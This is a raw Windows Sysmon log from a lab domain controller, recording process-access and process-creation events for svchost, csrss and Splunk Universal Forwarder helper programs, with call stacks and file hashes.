13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8FDE-6005-0301-00000000A301}3168C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.036{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FDE-6005-0301-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:46.037{59A5CD1D-8FDE-6005-0301-00000000A301}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.333{59A5CD1D-8FDF-6005-0401-00000000A301}18085008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FDF-6005-0401-00000000A301}1808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:47.193{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8FDF-6005-0401-00000000A301}1808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.193{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FDF-6005-0401-00000000A301}1808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:47.194{59A5CD1D-8FDF-6005-0401-00000000A301}1808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.849{59A5CD1D-8FE0-6005-0601-00000000A301}48125004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FE0-6005-0601-00000000A301}4812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 